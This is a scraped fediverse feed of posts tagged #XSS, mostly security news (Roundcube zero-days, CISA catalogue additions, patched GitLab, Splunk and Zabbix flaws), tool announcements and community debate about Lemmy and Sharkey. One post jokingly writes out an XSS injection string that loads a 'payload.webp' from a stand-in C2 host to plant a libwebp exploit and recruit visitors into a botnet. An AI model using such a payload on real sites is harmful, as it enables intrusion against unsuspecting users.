nette_news, to programming
@nette_news@phpc.social avatar

🥳 Latte 3.0.15 was released!

Latte - the first truly secure and
intuitive templates for PHP.

https://github.com/nette/latte/releases/tag/v3.0.15
https://nette.org/en/releases
https://latte.nette.org/

#nettefw #programming #webdev #templating #php #security #xss

jomo, to infosec
@jomo@mstdn.io avatar
simontsui, to random

Hot off the press! CISA adds CVE-2023-43770 (6.1 medium) Roundcube Webmail Persistent Cross-Site Scripting (XSS) Vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog.
🔗 (to be replaced later) https://www.cisa.gov/known-exploited-vulnerabilities-catalog

#CISA #KEV #KnownExploitedVulnerabilitiesCatalog #vulnerability #eitw #Roundcube #XSS #activeexploitation #CVE_2023_43770

simontsui,

Why you should care about CVE-2023-43770:
ESET Research previously reported on 25 October 2023 that the Winter Vivern APT was exploiting a similar RoundCube cross-site scripting vulnerability CVE-2023-5631 as a zero-day against European overnmental entities and a think tank.

#CISA #KEV #KnownExploitedVulnerabilitiesCatalog #vulnerability #eitw #Roundcube #XSS #activeexploitation #CVE_2023_43770 #WinterVivern #APT #cyberespionage

r1cksec, to infosec

New cheatsheets pushed 🕵️‍♂️​

https://github.com/r1cksec/cheatsheets

Including:

A nice writeup about a XSS vulnerability found on chess.com♟️​
https://skii.dev/rook-to-xss

This tool can be used as a framework for CI/CD security analysis :github:​
https://github.com/CycodeLabs/raven

A great post about Process Injection in the context of Kernel Triggered Memory Scans :hacked:​
https://www.r-tec.net/r-tec-blog-process-injection-avoiding-kernel-triggered-memory-scans.html

0x58, to Cybersecurity
teriradichel, to AWS

A Firewall For AWS CloudShell
~~
ACM.446 Attempting to prevent outbound credential exfiltration via self-XSS
~~
#cloudshell #xss #credentials #container #aws #security #firewall

https://medium.com/cloud-security/a-firewall-for-aws-cloudshell-8c07bc026415

mima, to lemmy

#Sharkey's recent vulnerability and their handling of it is still miles better than #Lemmy's #XSS exploit which actually took down a big instance and is something even more elementary than what Sharkey experienced.

Like seriously, the first thing you do when #Markdown parsing is involved is to sanitize the hell out of it, both in the Markdown input and the HTML output. And you put up a strict #CSP for good measure. Lemmy spectacularly failed on both counts, despite existing as a project for years and a lot more instances (and therefore users, which rivals #Mastodon) using their software!

I can cut some slack for the Sharkey devs here because:

  • they're relatively new (only months since the project started)
  • it only affected note imports from #Twitter which is already niche enough
  • it was easy to mitigate (just disable note import)
  • it didn't affect single-user instances IIUC
  • I haven't seen any Sharkey instance get actually exploited by this
  • they're taking steps to make sure this shit doesn't happen again (haven't seen this from Lemmy yet, and last I checked their CSP is still shit)

So this is not worth blowing over in the #fediverse. Your assessment is exaggerated, this energy could've been spent somewhere else, and you owe the Sharkey devs an apology.

#fediversemeta #security

RE: https://meowcity.club/fedi/tetra/p/1706812792.496325

alien, to me
@alien@fosstodon.org avatar

I switched the blog’s theme

A blog is something personal, and theming it just right is a challenge. You'll surely have noticed that the theme of Alien Pastures has been changed overnight.

This blog started out with a theme by Andreas Viklund (wp-andreas01) but that did not scale well on mobile devices, also it did weird stuff with user comments. I liked its v

https://alien.slackbook.org/blog/i-switched-the-blogs-theme/

#Me #blog #theme #vulnerability #wordpress #xss

nono2357, to web
heisec, to security German

Informationsleck in "Counter-Strike 2": Manipulierte Namen erlaubten IP-Abgriff

Wer seinen Spielernamen in "Counter-Strike 2" zu einem HTML-Tag änderte, konnte mittels eines Webservers die IP-Adressen der Mitspieler abgreifen.

https://www.heise.de/news/Informationsleck-in-Counter-Strike-2-Manipulierte-Namen-erlaubten-IP-Abgriff-9572084.html?wt_mc=sm.red.ho.mastodon.mastodon.md_beitraege.md_beitraege

#Security #XSS #news

acrypthash, to security

I am a big CS2 player. I hope this can get resolved quickly.

https://www.pcgamesn.com/counter-strike-2/ip-exploit

#security #cs2 #XSS

heisec, to security German

Entwicklungsplattform: Neue GitLab-Versionen beheben zehn Sicherheitslücken

Neben Cross-Site-Scripting und Rechteproblemen beheben die neuen Versionen der Versionsverwaltung auch DoS-Lücken. Das GitLab-Team empfiehlt ein Update.

https://www.heise.de/news/Entwicklungsplattform-Neue-GitLab-Versionen-beheben-zehn-Sicherheitsluecken-9547411.html?wt_mc=sm.red.ho.mastodon.mastodon.md_beitraege.md_beitraege

#XSS #Git #Security #news

heisec, to machinelearning German

Sicherheitsforscher finden kritische Fehler in KI-Werkzeugen Ray, MLflow und H2O

Die beliebten Werkzeuge für KI-Anwendungen leiden unter Codeschmuggel, illegitimen Dateimanipulationen und anderen Bugs. Nicht immer sind Updates verfügbar.

https://www.heise.de/news/Sicherheitsforscher-finden-kritische-Fehler-in-KI-Werkzeugen-Ray-MLflow-und-H2O-9534429.html?wt_mc=sm.red.ho.mastodon.mastodon.md_beitraege.md_beitraege

#XSS #KünstlicheIntelligenz #MachineLearning #Security #news

heisec, to security German

Code-Schmuggel: Neue Splunk-Versionen beheben Sicherheitslücken

Unsichere XML-Verarbeitung und ungenügende Prüfung von Logeinträgen ermöglichten Angreifern, eigenen Code in Splunk-Produkte zu schleusen.

https://www.heise.de/news/Code-Schmuggel-Neue-Splunk-Versionen-beheben-Sicherheitsluecken-9533636.html?wt_mc=sm.red.ho.mastodon.mastodon.md_beitraege.md_beitraege

#XSS #Security #news

ericfreyss, to random French
@ericfreyss@mastodon.social avatar

Pro-Russia hackers target inboxes with 0-day in webmail app used by millions
"Previously unknown #XSS in #Roundcube let #WinterVivern steal government emails."
@arstechnica
https://arstechnica.com/security/2023/10/pro-russia-hackers-target-inboxes-with-0-day-in-webmail-app-used-by-millions/

itnewsbot, to security
@itnewsbot@schleuss.online avatar

Pro-Russia hackers target inboxes with 0-day in webmail app used by millions - Enlarge (credit: Getty Images)

A relentless team of pro-Russia... - https://arstechnica.com/?p=1978806 #wintervivern #roundcube #security #zero-day #biz#xss

heisec, to security German

Schwere Sicherheitslücken in Monitoring-Software Zabbix behoben

In verschiedenen Komponenten der Monitoringsoftware Zabbix klafften kritische Sicherheitslücken, die Angreifern die Ausführung eigenen Codes ermöglichen.

https://www.heise.de/news/Schwere-Sicherheitsluecken-in-Monitoring-Software-Zabbix-behoben-9333656.html?wt_mc=sm.red.ho.mastodon.mastodon.md_beitraege.md_beitraege

#Security #XSS #news

itnewsbot, to wordpress
@itnewsbot@schleuss.online avatar

Thousands of WordPress sites have been hacked through tagDiv plugin vulnerability - Enlarge (credit: Getty Images)

Thousands of sites running the ... - https://arstechnica.com/?p=1974522 #cross-sitescripting #vulnerabilities #wordpress #security #plugins #biz#xss

rceninja, to infosec

I'm usually a grey hat but my evil brain commands me to insert that crafted webp image (#libwebp ) and upload that to popular websites using #XSS </scrip</script>t><img src ="https:myc2server.fy/payload.webp" onerror=prompt(8)> and get RCE into users computers and add them to the botnet lol

Prevention : add .webp extention to ublock origin custom rules or on the whole DNS level.

#infosec #cybersecurity #tip #mastodon #security #oscp

doyensec, to random

Introducing Session Hijacking Visual Exploitation (SHVE): A new tool for taking #xss exploitation to the next level - remotely viewing a target's browser

Details on our blog: https://blog.doyensec.com/2023/08/31/introducing-session-hijacking-visual-exploitation.html

Download it today: https://github.com/doyensec/Session-Hijacking-Visual-Exploitation/

#doyensec #appsec #appsecurity #websecurity

voidstar, to javascript

New blog post :)

Hacking GTA V RP Servers Using Web Exploitation Techniques

https://www.nullpt.rs/hacking-gta-servers-using-web-exploitation

#javascript #xss #gamehacking #reverseengineering

tulpa, to random
@tulpa@fosstodon.org avatar

@Tutanota I see that there have been a few #XSS vulnerabilities in the clients in the past. In that case, the client credentials could be stolen from the client.

Is there any mitigation in place for this? Like, would the credentials not be accepted if coming from a different IP, something like that?

Of course the protections against XSS are valuable. But we can't assume there won't be more vulnerabilities in the future.

tulpa, to bitwarden
@tulpa@fosstodon.org avatar

#Bitwarden, like most cloud-based password managers, has a web vault.Imagine a stored #XSS on that. All your passwords stolen.

Thankfully, you probably aren't viewing untrusted content if you're an individual user (you put the data in yourself and now you're getting it back out). But for organization users, where you can see things created by someone else on your subscription? That could be possible.

Edent, to BugBounty
@Edent@mastodon.social avatar

Found a tasty little #XSS in a new service.
Have performed a #ResponsibleDisclosure - but I doubt they offer a #BugBounty.

SHA1 of the domain: 158281f1ff672afa1159fcb6788aa6825dbb0773

Edent,
@Edent@mastodon.social avatar

For those playing along at home, the answer was....

codeberg.page

https://shkspr.mobi/blog/2023/01/responsible-disclosure-xss-in-codeberg-pages/

#XSS

  • All
  • Subscribed
  • Moderated
  • Favorites
  • JUstTest
  • kavyap
  • DreamBathrooms
  • thenastyranch
  • magazineikmin
  • tacticalgear
  • khanakhh
  • Youngstown
  • mdbf
  • slotface
  • rosin
  • everett
  • ngwrru68w68
  • Durango
  • provamag3
  • InstantRegret
  • cubers
  • GTA5RPClips
  • cisconetworking
  • ethstaker
  • osvaldo12
  • modclub
  • normalnudes
  • anitta
  • tester
  • megavids
  • Leos
  • lostlight
  • All magazines